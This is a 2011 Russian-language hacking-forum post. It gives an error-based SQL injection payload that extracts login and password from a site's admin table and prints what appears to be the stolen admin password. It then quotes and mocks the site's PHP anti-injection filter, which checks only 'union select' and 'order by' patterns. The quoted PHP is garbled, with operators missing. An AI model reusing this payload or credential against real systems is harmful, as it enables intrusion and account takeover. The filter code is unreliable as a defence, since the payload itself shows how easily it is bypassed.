Показать сообщение отдельно
Старый 19.04.2011, 15:09   #2
it's my
 
Регистрация: 06.07.2010
Сообщений: 39
Репутация: 11
По умолчанию

Код:
POST: manufacturer=(0)or(select(count(*))from(pers_catalog_items)group/*test*/by(concat((select(concat_ws(0x3a,login,password))from(pers_admins)),0x00,floor(rand(0)*2))))
пасс админа: asdklfju78o4ij

хахаха, так дела не делаются ))
PHP код:
public static function StopInjections(){
            
$get_ar array_values($_GET);
            
$c_a_g count($get_ar);
            for (
$i 0;$i $c_a_g;$i++){
                if(
eregi('union(.*)select',$get_ar[$i]))
                    
self::Err404();
                if(
eregi('order(.*)by',$get_ar[$i]))
                    
self::Err404();
            }
            
            
$post_ar array_values($_POST);
            
$c_a_p count($post_ar);
            for (
$i 0;$i $c_a_p;$i++){
                if(
eregi('union(.*)select',$post_ar[$i]))
                    
self::Err404();
                if(
eregi('order(.*)by',$post_ar[$i]))
                    
self::Err404();
            }
        } 
it's my вне форума   Ответить с цитированием